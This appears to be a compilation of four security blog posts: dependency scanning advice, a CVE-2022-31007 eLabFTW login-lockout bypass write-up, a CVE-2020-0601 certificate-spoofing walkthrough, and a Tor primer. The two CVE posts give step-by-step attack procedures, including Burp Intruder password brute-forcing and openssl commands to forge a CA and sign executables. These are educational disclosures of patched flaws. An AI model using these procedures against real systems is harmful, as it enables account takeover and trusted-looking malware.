Open-source software dependencies are used very often when developing web applications. I found some stats on the internet that around 90% of web applications consist of third-party components.

Based on my experience, this info is quite accurate. Mainly because of the deadlines, you would use already created components, and because of the cost, you would use open-source ones.

The problem when using open-source dependencies while developing the application is that developers would most likely choose the most used one by checking the downloads on Github, and many of them would not even bother to search about open-source vulnerabilities on the internet. Search on the internet can be tricky because that information can be found in many different sources, so they are not in one place.

There is also a possibility to look in the CVE database on this link or in the NIST database. Unfortunately, OSVDB is no longer active. Though you should remain aware that there is very little info on open-source vulnerabilities in these databases. Thus it is not enough to check these databases for vulnerabilities before you choose which dependency to use.

Why using open-source dependencies is dangerous if they are not checked frequently for vulnerabilities?

It is great that you would check for vulnerabilities to choose the right open-source dependency, which is fine when you want to start using them. But, when you start using the dependencies, you need to be sure that your web application is secure, so you would need to start checking vulnerabilities frequently!

Attackers are very aware of the third-party component used in web applications, the lack of security checks for dependency vulnerabilities, etc. Because of that awareness dependencies are often the largest attack surface!

For example, in November 2018, cyber attackers inserted malicious code into the EventStream component, which was used 6 million times. You can read more about it in this article.

What to do to secure the web application which is using open-source dependencies?

In short, you can check out vulnerabilities manually or automatically.

Besides the checking, always keep in mind that you should use new versions of libraries because some known bugs developers/testers found are fixed by each new version. And you know if there is a bug, there is a way for the attacker to “get in”! So, most simply put, always update your libraries!

By manually, I don’t mean you will go through the code itself and test packages for vulnerabilities. Although if you want, you can do that as well, it is very time-consuming, i.e., inefficient! I meant that you could use already existing tools that you would run and let them check all vulnerabilities of your application’s dependencies.

There are many open-source tools/services that can be used to check for dependency vulnerabilities.

I will list some of them:

• Dependency-check is a command line tool which is designed by OWASP. It checks Java, .NET, JavaScript, and Ruby. It gets information from NIST NVD.
• Node Security Project which targets Node.js modules and NPM dependencies. It uses two databases: NIST and his own.
• RetireJS targets JavaScript dependencies. It has a specific dependency check but also provides a site-checking service for JS library vulnerabilities. It gets information from NIST NVD as well as from other JS sources.
• OSSIndex targets JavaScript, C#(.NET), and Java library dependencies. It retrieves information from NIST NVD. It also gives a free vulnerability API.
• Bundler-audit targets Ruby Bundler. It gets information from the NIST NVD and RubySec.

And by automatically, I mean you would set up your deployment to automatically check on push, merge code, etc. I will cover it in the next chapter!

What is the purpose of setting up a vulnerability checker while deploying?

Before your web application is live secure the application by implementing code workflow in your pipeline! Ensure your code and application is safe before it becomes public!

In this stage, your DevOps people are crucial!

What can you do to set up the code flow check correctly?

So, you can integrate the tool for checking the vulnerabilities throughout the entire development process.

I will give an example of flow if you are using Azure services:

1. Scanning Azure Repos and Github
2. Scanning Azure Pipelines
3. Scanning Azure Container Registry
4. Scanning Azure functions

1. This stage would be divided into four parts: Scan, Prevent, Fix, and Monitor. Scan to detect vulnerabilities in the project by scanning Azure repos or Github. Scan pull requests and prevent them from being merged if they contain vulnerabilities. The implemented tool would scan for new updates and patches and automatically populate a fix. This stage is done daily. Also, you can configure the security level with a policy that will prevent code from being merged.
2. This stage would be divided into three parts: Test, Prevent, and Monitor. When the Build is in process, the tool scans application dependency for vulnerabilities, makes a report, and monitors them constantly.
3. This stage would be divided into three parts: Scan and monitor, Prevent and Fix. The tool would scan all container images for possible vulnerabilities. In this stage, policies can also be set up to stop the build if images contain new vulnerabilities. The tool would try to fix them.
4. This stage would be divided into three parts: Scan, Monitor, and Fix. The tool would scan applications running on Azure services, monitor them, and protect deployment to ensure that no new vulnerabilities could be found in the new environment.

*Note: There are plenty of tools available which can be integrated with Azure DevOps, such as Snyk, SonarCloud, AWS Toolkit, Ado Security Scanner, Beagle Security, and many more.

On the internet, you can find many guides on how to set up an environment, depending on which tool you are going to use.

Conclusion

Open-source vulnerabilities are a very hot topic nowadays. The more you investigate, the more you will be aware that using third-party libraries puts your security in someone else’s hands.

Of course, you are not going to stop using open-source dependencies, nor should you. But, if you follow the best practices I mentioned in the article, you will be aware of the vulnerabilities and have the time to react!

Stay informed!

Cover photo by Kasia Derenda

#dependency_vulnerabilities #third-party_libraries #open-source_dependencies #CVE #NIST

Introduction:

eLabFTW is a free and open source electronic laboratory notebook for researchers.1 Once installed on a server, it allows researchers to track their experiments, but also to manage their assets in the lab (antibodies, mouse, siRNAs, proteins, etc.).

Affected version:

This vulnerability affects users of the eLabFTW before 4.1.0, it allows attackers to bypass a bruteforce protection mechanism by using many different forged PHPSESSID values in HTTP Cookie header.

CVSS v3:

• CvSS Score 6.5

• Confidentiality Impact Partial

• Integrity Impact Partial

• Access Complexity Low

• Vulnerability type Gain Access

• Authentication Required

• Availability Impact Partial

Mitigation:

• Create a readFailedLoginByIp function on app/models/Logs.php to execute a query where the user field is REMOTE_ADDR and the body is Failed login attempt.

• Invoke readFailedLoginByIp function on login.php to validate if the count has reached the failed attempt limit and is banned.

• Or can be se the method recommended by OWASP with Device Cookies.

This mechanism will not impact users and will effectively thwart any brute-force attempts at guessing passwords. How it works quickly

• Successful login will create a cookie on the device

• Trying too many passwords from an untrusted device (no device cookies) will lock the account

• A locked account can only log in from a trusted device

• Even a good password guess on a locked account will be unsuccessful

Technical Analysis:

This section will explain how the lockout process works by testing the login page while also reviewing the source code and then making an attack process.

Lockout Process:

Assuming the administrator email is already known as “administrator@elabw.local” with a wrong password submitted in the login form will produce a failed login message. See Appendix A to enumerate valid email accounts.

From the flash messages above, failing 3 times will result in being banned for 1 hour. Let’s find out where in the source code these messages are triggered.

From the grep result above there are two files triggering the error messages: LoginController.php and login.html. Upon further inspection in LoginController.php file at line 74 there is an if-else validation for login failed attempt.

The code above will set failed_attempt key with value 1 in $Session variable if it’s not exist or, increment the value if it does. Because PHP handles and tracks $Session variables using PHPSESSID in a Cookie request header, which is controlled by the user, the bypass is very obvious. Simply using random value in PHPSESSID or, completely removing the Cookie header on each request to login.php will force the application to create a new session and the failed_attempt key will always be set to 1.

When inspecting the login page a hidden input called formkey was found and it’s required along with email and password as a data submitted to LoginController.php.

Attack Process:

This section will assemble what was found when identifying how the lockout process works.

1. Make a GET request to login.php

• Extract PHPSESSID from the response header

• Extract formkey from the response body

2. Make a POST request to LoginController.php with PHPSESSID and formkey from step 1 included and, use valid email address and wordlists for password on data field

3. Follow url redirections from step 2 response location header

• If url redirect location is login.php, automatically remove the Cookie header

• If url redirect location is not login.php, the attack is succeed.

Exploitation:

The exploit will use Burp Suite’s Intruder3 tool to automate the attack process. First step is to extract PHPSESSID and formkey from the login.php assuming the request was already made from the browser through Burp Suite Proxy. Navigating to Proxy > HTTP History, right-clicking on the GET request /login.php and select Send to Intruder:

Now navigate to Intruder window and choose Positions tab and remove a Cookie header if it exists:

Next, choose the Options tab and scroll down to Grep Extract. Tick Extract the following items from responses and set Maximum capture length to 150:

Click Add button then Refetch response and notice Set-Cookie header is being set. SelectPHPSESSID value and click OK:

Click Add button again and do the same for formkey value:

Select Always option on Redirections:

Navigate toHTTP History tab onProxy window then select POST /app/controllers/LoginController.php and copy the raw request:

Go back to Positions tab on Intruder window and paste copied raw request in the editor and then click Add § button to set a mark on these fields: PHPSESSID,password,formkey and set Attack type to Pitchfork:

Next, clicking the Payloads tab to set 3 payloads. Payload set 1 for PHPSESSID cookie value using “Recursive Grep”

Payload set 2 for password and set Payload type to “Simple list” then click Load to choose a small wordlist file from /usr/share/wordlists/wfuzz/others/common_pass.txt:

Payload set 3 for formkey using “Recursive Grep”:

Using Mitmproxy command-line mitmdump as upstream proxy to automatically remove Cookie header when following a redirect location request to /app/controllers/../../login.php.

Navigate to Project options > Connections > Upstream Proxy Servers, toggle Override user options and click Add button. Specify the Destination host to target domain elabw.local, Proxy host to 127.0.0.1 and Proxy port: 8081 and click OK:

Go back to Intruder window and start the attack by clicking on Start attack button:

See image above the Payload1 values are always changing and these values are taken from PHPSESSID columns for the next request. Forcing the application to create a new session so the failed_attempt key will always be set to 1. The lockout process successfully bypassed.

Notice in the highlighted request, the Length size is bigger than others and in the Response 1 tab, the Location header is pointed at “../../experiments.php” meaning the attack is successful.

Workarounds:

The only correct way to address this is to upgrade to version 4.1.0. Adding rate limitation upstream of the eLabFTW service is of course a valid option, with or without upgrading.

Reference:

1. https://www.cvedetails.com/cve/CVE-2022-31007/

2. https://github.com/elabftw/elabftw/security/advisories/GHSA-937c-m7p3-775v

#burp_suite #account_bypass #elabFTW #CVE-2022-31007

Vulnerability Details:

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

ECC relies on different parameters. These parameters are standardized for many curves. However, system didn’t check all these parameters. The parameter G (the generator) was not checked, and the attacker can therefore supply their own generator, such that when system tries to validate the certificate against a trusted CA, it’ll only look for matching public keys, and then use the generator of the certificate.

In order to yield the same public key to spoof the certificate, private key is set to 1

public Key = Private Key * Generator

Public Key = Generator

Trusted public key is used as the generator of spoofing certificate; Generator is not validated by system

MicrosoftECCProductRootCertificateAuthority.cer is by default a trusted root certificate authority (CA) using ECConWindows10. Anything signed with this certificate will therefore automatically be trusted.

CVSS v3:

• Base Code 5.8

• Confidentiality Impact Partial

• Integrity Impact Partial

• Access Complexity Medium

• Authentication not required

• Availability Impact non

Mitigation:

Microsoft Windows 2020 updates had been released to patch CVE-2020-0601 vulnerability.

Major Impacted Browsers:

• Windows 10: Version 1607

• Windows 10 Version 1709

• Windows 10 Version 1803

• Windows 10 Version 1809

• Windows 10 Version 1903

• Windows 10 Version 1909

• Windows Server 2016-

• Windows Server 2016 Version 1803

• Windows Server 2016 Version 1903

• Windows Server 2016 Version 1909

• Windows Server 2019-

Exploitation:

Files location – https://packetstormsecurity.com/files/author/14686

Extract the public key from the trusted CA

ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer

Generate a new x509 certificate based on this key. This will be spoofed CA

openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt

Generate a new key. It will be used to create a code signing certificate, which we will sign with our own CA

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Next, create a new certificate signing request (CSR)

openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls

Sign new CSR with spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043.

ope

openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key –CAcreateserial
-out cert.crt -days 10000 -extfileopenssl_tls.conf -extensions v3_tls

Pack the certificate, its key and the spoofed CA into a PKCS12 file for signing executables

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code
Signing" -out cert.p12

Sign your executable with PKCS12 file

osslsigncode sign -pkcs12 cert.p12 -n "Signed" -in 7z1900-x64.exe -out 7z1900- x64_signed.exe

In windows VM, navigate to C:WindowsSystem32driversetchosts

Add IP address of Ubuntu VM and URL - https://www.google.com

Files cert.crt, cert.key, and spoofed_ca.crt are used to serve content. Add the spoofed_ca.crt as a certificate chain in your server’s HTTPS configuration. Configure “index.js” server file.

Server is started in Ubuntu VM

In Windows VM, open browser and navigate to https://www.google.com.

Error - “Your connection isn’t private” is displayed

Check certificate information. It is changed to the details of the spoofed certificate

The CA Root certificate is not trusted because it is not in the Trusted Root Certification Authorities store

Export the certificate

Install the spoofed certificate in Trusted Root Certification Authorities

Spoofed Certificate is in Trusted Root Certification Authorities

Open Browser – Internet Explorer and navigate to https://www.google.com

Spoofed CA is validated by web browser as Trusted Root CA and original https://www.google.comcontent is replaced with the incorrect information as mentioned in “index.js” file.

CVE-2020-0601 – Windows incorrect ECC certificate validation vulnerability is implemented

Reference:

– https://nvd.nist.gov/vuln/detail/CVE-2020-0601

– https://packetstormsecurity.com/files/author/14686/

– github.com-ollypwn-CVE-2020-0601_-_2020-01-17_10-09-11

#CryptoAPI #webbrowser #microsoft #certificate #certificatevalidation #CVE-2020-0601

Tor

You can say that Tor is an open-source, anonymizing, encrypted, volunteer-operated proxy network. It distributes your traffic over several layers (or relays) so that no single point can link you with your destination. Basically, you go through these relays before reaching that destination.

This helps you reduce the risk from both simple and more complex network analysis.

For example, installing the Tor browser on your client (Windows) machine will place a Socks5 proxy on it. You can configure it to push all the Internet traffic you want through that proxy – taking the same path.

Packets sent are encrypted and enter the Tor network encrypted; after that, they get bounced from node to node until they reach the exit node, where the packets get decrypted, and you arrive at your final destination – like Facebook. We call this a Tor circuit.

The example above takes the clear web into consideration. To access Tor’s hidden services, you need a .onion URL, a special URL required to access the Tor Darknet. Note that the exit node is not really required in this case, as you’re not leaving the Tor network; you’re going to a server that’s within the network.

This also means that your traffic will stay encrypted (end-to-end). The main idea about Tor here is that no individual relay (node) will know the complete path you’ve taken. In fact, the client negotiates a different set of keys for each hop within the Tor circuit. Thus, no hop can trace these connections as they are passing through.

There’s 10 minutes or so window for circuits (Tor uses the same circuit) where it will use the same circuit, but the later requests will be given a new circuit, keeping people from linking your previous actions to your later ones.

It’s important to note that Tor is not solving all the privacy and anonymity problems! Tor does not cover everything and is not a silver bullet, but it can be an extremely useful tool to help you protect your privacy and anonymity when configured correctly and when used in conjunction with other tools/layers that will keep your privacy and anonymity unscathed.

Tor utilizes the Diffie-Hellman handshake, which is used to establish the session keys (I mentioned above that the client negotiates different keys for each node); Diffie-Hellman basically lets your client negotiate the session keys in such a way that even if the negotiation was listened to by a MiTM (Man in The Middle), they wouldn’t be able to establish what the mutually agreed session key was.

Another thing that Tor uses is something called Perfect Forward Secrecy, which means the session keys are used briefly and later replaced. This means that if one of the nodes were to get compromised, data that already passed through it can’t be decrypted with the private keys because the keys have changed since then.

Tor is both a piece of software and an anonymizing network. A live representation of the Tor network can be seen here. The Tor browser (software) is what lets you access the Tor network.

Most of the Tor relays are to be found in Central Europe. From the link above, you can see the network’s historical development. You might experience more (or less) latency depending on your proximity to the nodes. The Tor network is generally known to not be blazing fast.

The Tor browser itself is a hardened Mozilla Firefox ESR (it has NoScript, HTTPS Everywhere, and Tor proxy browser addons). It can be also run from a removable media (standalone) and is cross-platform – available on Windows, Mac, GNU/Linux.

You can verify and download it from https://www.torproject.org/.

Once installed, and started, you will see a Firefox-like UI, and will be greeted with a welcome message for the first time. I will not cover how you can configure these, for the most part, its almost the same as for your Firefox broswer, so if you’re a Firefox user, you’ll feel at home. I will just share some thoughts below (check the third screenshot); This is more to give you an idea on what approach we need to have here, but the more technical aspects is something I will gradually build up to as we go through the series.

Note the two options from the second screenshot. The New Circuit option will make you go through a different exit node, and will basically present a new IP address but you can still have trackable items in your browser (even though the browser tries to fight that anyway, its still possible), but the New Identity option will restart the browser itself. This is the big difference between the two options, the New Identity will attempt to wipe everything that is contained within the browser and could be linked/used for tracking, which is why it restarts.

For an attempt at anonimity, you want the security settings set at the Safest option, even though it might break some websites. But, if that’s not chosen, deanonymizing is much easier, and it kinda defeats the purpose of using Tor in the first place. You obviously want to restrict 3pp cookies, disable browser plugins (Flash), never record browsing history or website data, and change details that distinguish you from other Tor Browser users.

Resources

https://support.torproject.org/ – Check out the Most Frequently Asked Questions section

https://tor.stackexchange.com/ – A stackoverflaw-like Tor messageboard where you can find answers to your Tor-related questions

https://blog.torproject.org/ – A blog by the Torproject

https://gitlab.torproject.org/tpo/team – This used to be the Tor wiki, a lot of useful information here

https://www.reddit.com/r/tor – Tor subreddit which can be very useful to you

https://2019.www.torproject.org/projects/torbrowser/design/ – If you want to really jump down the rabbit hole that is Tor, this might be the best place to be, as these are basically the design documents for Tor

Conclusion

I hope you liked this article, and that I’ve managed to shed some light on Tor! There’s way more to unpack here, and I hope to gradually help you familiarize yourself with this enormous topic, by building upon what was written in previous articles, so, stay tuned for the next one!

Cover image – taken from https://torflow.uncharted.software/

#tor #tor-circuit #nodes #onion